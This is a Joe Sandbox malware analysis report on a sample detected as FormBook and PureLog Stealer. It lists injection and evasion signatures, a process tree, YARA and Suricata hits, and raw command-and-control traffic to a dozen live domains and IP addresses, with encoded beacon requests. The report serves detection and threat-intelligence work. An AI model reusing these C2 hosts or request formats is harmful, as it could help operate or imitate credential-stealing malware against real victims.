Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562914
MD5:09e5c83fa32b0bb661143784179329a0
SHA1:0fa6b1217891055124b62ed520f63d7d2b28536e
SHA256:1258f319f29525155f61593b7533e03ab0db3bc3fb823842a752044e80790a3c
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 09E5C83FA32B0BB661143784179329A0)
    • file.exe (PID: 500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 09E5C83FA32B0BB661143784179329A0)
      • YpbicUfTwt.exe (PID: 5348 cmdline: "C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • find.exe (PID: 3568 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • YpbicUfTwt.exe (PID: 6504 cmdline: "C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.file.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.file.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.file.exe.7200000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.file.exe.7200000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.file.exe.3e39970.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-26T09:26:58.603302+010020507451Malware Command and Control Activity Detected192.168.2.849761185.26.237.17080TCP
                      2024-11-26T09:27:36.156305+010020507451Malware Command and Control Activity Detected192.168.2.84971215.197.142.17380TCP
                      2024-11-26T09:28:01.113609+010020507451Malware Command and Control Activity Detected192.168.2.849717172.67.213.24980TCP
                      2024-11-26T09:28:15.930091+010020507451Malware Command and Control Activity Detected192.168.2.84972113.248.169.4880TCP
                      2024-11-26T09:28:31.005926+010020507451Malware Command and Control Activity Detected192.168.2.849725173.0.157.18780TCP
                      2024-11-26T09:28:47.196730+010020507451Malware Command and Control Activity Detected192.168.2.84972913.227.8.4580TCP
                      2024-11-26T09:29:10.336980+010020507451Malware Command and Control Activity Detected192.168.2.84973313.248.169.4880TCP
                      2024-11-26T09:29:26.297337+010020507451Malware Command and Control Activity Detected192.168.2.84973738.47.233.480TCP
                      2024-11-26T09:29:41.221072+010020507451Malware Command and Control Activity Detected192.168.2.849741199.192.23.12380TCP
                      2024-11-26T09:29:56.496958+010020507451Malware Command and Control Activity Detected192.168.2.849745104.21.36.23980TCP
                      2024-11-26T09:30:13.423589+010020507451Malware Command and Control Activity Detected192.168.2.849749208.91.197.2780TCP
                      2024-11-26T09:30:28.972131+010020507451Malware Command and Control Activity Detected192.168.2.849753199.59.243.22780TCP
                      2024-11-26T09:30:44.357789+010020507451Malware Command and Control Activity Detected192.168.2.84975713.248.169.4880TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: file.exeReversingLabs: Detection: 34%
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: find.pdb source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpbicUfTwt.exe, 00000004.00000002.3854637326.000000000029E000.00000002.00000001.01000000.0000000C.sdmp, YpbicUfTwt.exe, 00000007.00000000.1639437568.000000000029E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000005.00000003.1566753130.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000003.1573647222.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: file.exe, 00000003.00000002.1567304245.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000004.00000002.3861151206.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006DC7D0 FindFirstFileW,FindNextFileW,FindClose,5_2_006DC7D0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then xor eax, eax5_2_006C9E70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then mov ebx, 00000004h5_2_00DC04D8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 172.67.213.249:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 199.59.243.227:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 38.47.233.4:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 199.192.23.123:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 13.227.8.45:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 104.21.36.239:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 173.0.157.187:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49761 -> 185.26.237.170:80
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
                      Source: Joe Sandbox ViewIP Address: 15.197.142.173 15.197.142.173
                      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.dojodigitize.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.masterqq.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hasan.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.0be.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.tageting.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.ssps.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.qqc5.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.learnnow.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.goldbracelet.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.regislemberthe.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /c8xp/?ynlT=l2hePdG2jE2F6AlCjwqyhHlkxUQzRJGliE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCi0s4BCVbW+K50/dKIaUUEtFLragHdQcQoqOBThjHGNr3A==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.honk.cityConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /t3a1/?ynlT=lPY12PoV4Qu/vhxaDGrG8k6ABtrDoTA3UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE3V94n9AcHyNncbJEzMiuzMO81JxmNo9FVK575fLvIMTSQ==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gupiao.betConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.fengzheng.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficDNS traffic detected: DNS query: www.dojodigitize.shop
                      Source: global trafficDNS traffic detected: DNS query: www.masterqq.pro
                      Source: global trafficDNS traffic detected: DNS query: www.hasan.cloud
                      Source: global trafficDNS traffic detected: DNS query: www.0be.info
                      Source: global trafficDNS traffic detected: DNS query: www.tageting.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ulojenukw.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ssps.shop
                      Source: global trafficDNS traffic detected: DNS query: www.qqc5.top
                      Source: global trafficDNS traffic detected: DNS query: www.learnnow.info
                      Source: global trafficDNS traffic detected: DNS query: www.goldbracelet.top
                      Source: global trafficDNS traffic detected: DNS query: www.regislemberthe.online
                      Source: global trafficDNS traffic detected: DNS query: www.honk.city
                      Source: global trafficDNS traffic detected: DNS query: www.gupiao.bet
                      Source: global trafficDNS traffic detected: DNS query: www.fengzheng.shop
                      Source: unknownHTTP traffic detected: POST /vfw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.masterqq.proCache-Control: no-cacheContent-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.masterqq.proReferer: http://www.masterqq.pro/vfw3/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)Data Raw: 79 6e 6c 54 3d 6d 6f 49 59 76 59 71 37 45 45 76 56 55 52 61 38 46 33 5a 66 5a 4a 4b 4c 54 56 49 30 37 72 41 69 57 4e 55 33 51 53 43 61 6f 76 4c 34 6a 53 47 4e 78 34 61 52 66 38 48 2b 64 44 75 6e 61 54 2f 64 67 62 56 34 61 70 34 75 67 2f 31 53 6c 2f 4e 2b 51 74 79 58 53 74 64 7a 32 6e 38 74 7a 32 31 43 5a 2b 66 77 6b 50 51 2b 74 48 51 63 47 75 44 42 41 6b 39 56 4a 39 46 4f 4a 66 39 62 6a 4c 6b 4a 41 4f 41 7a 65 48 73 35 46 46 68 39 57 42 76 42 78 55 35 36 73 56 77 76 4d 4a 4f 65 30 51 4b 77 78 48 64 66 42 50 58 75 4f 44 65 6d 4e 4b 74 78 30 4c 7a 37 6e 35 55 6e 4e 6e 51 63 50 41 54 5a 6b 43 6a 62 44 66 30 3d Data Ascii: ynlT=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxHdfBPXuODemNKtx0Lz7n5UnNnQcPATZkCjbDf0=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Tue, 26 Nov 2024 08:27:35 GMTContent-Length: 0Connection: closeWAFRule: 5
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:27:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCsFWfjLv620tjP4iq5iNp3c0bVeyRYZ1WG4e8g40Wuqx4cGzLe6T5Yr%2FeE3nMuv9GYUMaEPMkz4dAsfDOY5cyjmhbnnS4ekaI3eDYby4okFz6Wz6kXimls1F6WMGdWtuOqb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e88807658804400-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=707&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:27:55 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COCxnX7ChKNOHP0FlugX7V0dAfhywGscetcl639ZtlEfw%2Fh5cHyhR4B%2BQMQJHhc6Ro%2B2QUC5vS9EsNQeCMlhSyLpc03v%2FKmGYuCNqYXlzFncb78HC2L7wYxGUMgju66RpI%2BP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e888086d8b4c342-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1529&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 